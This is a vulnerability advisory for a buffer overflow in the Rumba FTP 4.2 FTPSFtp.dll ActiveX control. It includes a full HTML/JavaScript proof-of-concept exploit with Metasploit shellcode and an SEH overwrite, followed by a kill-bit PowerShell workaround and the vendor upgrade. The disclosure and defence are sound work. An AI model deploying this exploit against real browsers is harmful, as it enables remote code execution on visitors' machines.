Rumba FTP Client FTPSFtp.dll ActiveX Control Buffer Overflow Vulnerability

Affected systems:

NetManage Rumba FTP 4.2

Unaffected systems:

NetManage Rumba FTP 4.2.3

Description:

Rumba FTP is a graphical FTP client.

The FTPSFtp.dll ActiveX control installed by the Rumba FTP client does not properly validate the string argument passed to its OpenSession() method. If a user is tricked into visiting a malicious web page that passes an overly long argument to this method, a buffer overflow is triggered, which can lead to execution of arbitrary code.

<*Source: sinn3r (x90.sinner@gmail.com)*>

Test method:

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

<html>
<head>
<title>Rumba FTP Client FTPSFtp.dll v4.2.0.0 OpenSession() Buffer Overflow by sinn3r</title>
</head>
<body>
<object classid="clsid:677A6F83-52A0-4931-8E62-EC713EE9B949" id="ftpsftp"></object>
<script language="JavaScript">
// http://www.metasploit.com  windows/exec cmd=calc.exe 200 bytes
shellcode = "PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIKLM8LI5PUPUPSPM"+
            "YZEVQN2BDLKPRVPLKQB4LLK0RR4LKSBWX4ONW1ZWVFQKO6QO0NLWL3QSLS26L7PIQ8ODM5QIWK"+
            "RZPPRQGLKQB4PLKPB7L5QXPLKQP2XK5IP44QZ5QXPPPLKQX4XLKQHGPUQN3KSGLQYLKP4LKUQ9"+
            "FFQKOVQO0NL9QXODM5QYWFXKPD5JT4C3MZXWK3MWTT5KRPXLKQHWTEQ8SCVLKTLPKLKQH5LEQN"+
            "3LKS4LKC1XPMY1TWTGT1KQKSQ0YPZ0QKOKP0XQOQJLKTRJKMVQMCZUQLMLEOIUPUPC0PPRHP1L"+
            "KROLGKON5OKZPNUORF6RHOVLUOMMMKOIE7LC6SLUZMPKKM0BU5UOKQWB32R2ORJ5PPSKOHUE35"+
            "12LSS6N3U2X3UUPDJA";

eaxAlign  = unescape(
"%58"+      //POP EAX
"%04%0B"    //ADD AL, 0x0B
);

// Original fuzzed size = 13332 bytes. This POC uses 5000 bytes.
var padding1    = unescape("%41");
while (padding1.length < 600)
    padding1 += unescape("%41");
var nseh    = unescape("%EB%06%42%42"); //Short JUMP
var seh     = unescape("%71%33%6E%74"); //0x746E3371  msls31.dll  <-- IE 6 addr
var padding2    = unescape("%41");
while (padding2.length < 4389-shellcode.length)
    padding2 += unescape("%41");

ftpsftp.OpenSession(padding1 + nseh + seh + eaxAlign + shellcode + padding2);
</script>
<pre>
|------------------------------------------------------------------|
|   Rumba FTP Client FTPSFtp.dll v4.2.0.0 OpenSession() Overflow   |
|                                                                  |
| by sinn3r - Corelan & Exploit-DB             twitter.com/_sinn3r |
|------------------------------------------------------------------|

This bug was found when I was verifying another bug for Exploit-DB. Please note that
the latest version of FTPSFtp.dll v4.2.3.0.0 is no longer vulnerable to this, and it
is (duh!) recommended to update your Rumba FTP to the latest version if possible.

[+] Vulnerable Component = FTPSFtp.dll
[+] Version              = 4.2.0.0
[+] Function:            = OpenSession ( ByVal __MIDL_0011 As String ) As Object
[+] progid               = FTPSFTPLib.SFtpApplication
[+] Tested on            = Windows XP SP3 ENG + IE 6
[+] Payload              = windows/exec cmd=calc.exe
[+] Special thanks       = rAWjAW and chap0 for testing
</pre>
</body>
</html>

Recommendation:

Temporary workaround:

* Set the kill bit for CLSID 677A6F83-52A0-4931-8E62-EC713EE9B949.
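The workaround above can be applied and verified from an elevated PowerShell session. This is an added example, not part of the original advisory or the vendor's tooling; it assumes the standard Internet Explorer kill-bit mechanism (the Compatibility Flags DWORD, bit 0x400, under the ActiveX Compatibility key) and uses the CLSID quoted in the advisory.

```powershell
# Added example (not from the advisory): set and verify the IE kill bit for the
# vulnerable FTPSFtp.dll control so Internet Explorer refuses to instantiate it.
# Run from an elevated PowerShell session.

$Clsid   = '{677A6F83-52A0-4931-8E62-EC713EE9B949}'   # CLSID from the advisory
$KillBit = 0x400                                       # documented IE kill-bit flag

# 32-bit IE on 64-bit Windows reads the Wow6432Node view, so cover both views there.
$KeyPaths = @("HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid")
if ([Environment]::Is64BitOperatingSystem) {
    $KeyPaths += "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
}

function Set-ActiveXKillBit {
    param([string[]]$Paths, [int]$Flag)
    foreach ($p in $Paths) {
        if (-not (Test-Path $p)) { New-Item -Path $p -Force | Out-Null }
        # Preserve any compatibility flags already present; only OR in the kill bit.
        $current = (Get-ItemProperty -Path $p -Name 'Compatibility Flags' `
                    -ErrorAction SilentlyContinue).'Compatibility Flags'
        if ($null -eq $current) { $current = 0 }
        New-ItemProperty -Path $p -Name 'Compatibility Flags' -PropertyType DWord `
                         -Value ($current -bor $Flag) -Force | Out-Null
    }
}

function Test-ActiveXKillBit {
    param([string[]]$Paths, [int]$Flag)
    # Returns $true only if every relevant key exists and carries the kill bit.
    foreach ($p in $Paths) {
        $v = (Get-ItemProperty -Path $p -Name 'Compatibility Flags' `
              -ErrorAction SilentlyContinue).'Compatibility Flags'
        if ($null -eq $v -or (($v -band $Flag) -ne $Flag)) { return $false }
    }
    return $true
}

Set-ActiveXKillBit -Paths $KeyPaths -Flag $KillBit
if (Test-ActiveXKillBit -Paths $KeyPaths -Flag $KillBit) {
    Write-Output "Kill bit set for $Clsid"
} else {
    Write-Output "Kill bit NOT set for $Clsid; check that the session is elevated"
}
```

Setting the kill bit only blocks the control inside Internet Explorer; it does not patch FTPSFtp.dll itself, so upgrading to Rumba FTP 4.2.3 remains the actual fix.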

Vendor patch:

NetManage
---------
The vendor has released an upgrade patch to fix this security issue; please download it from the vendor's home page:

http://www.netmanage.com
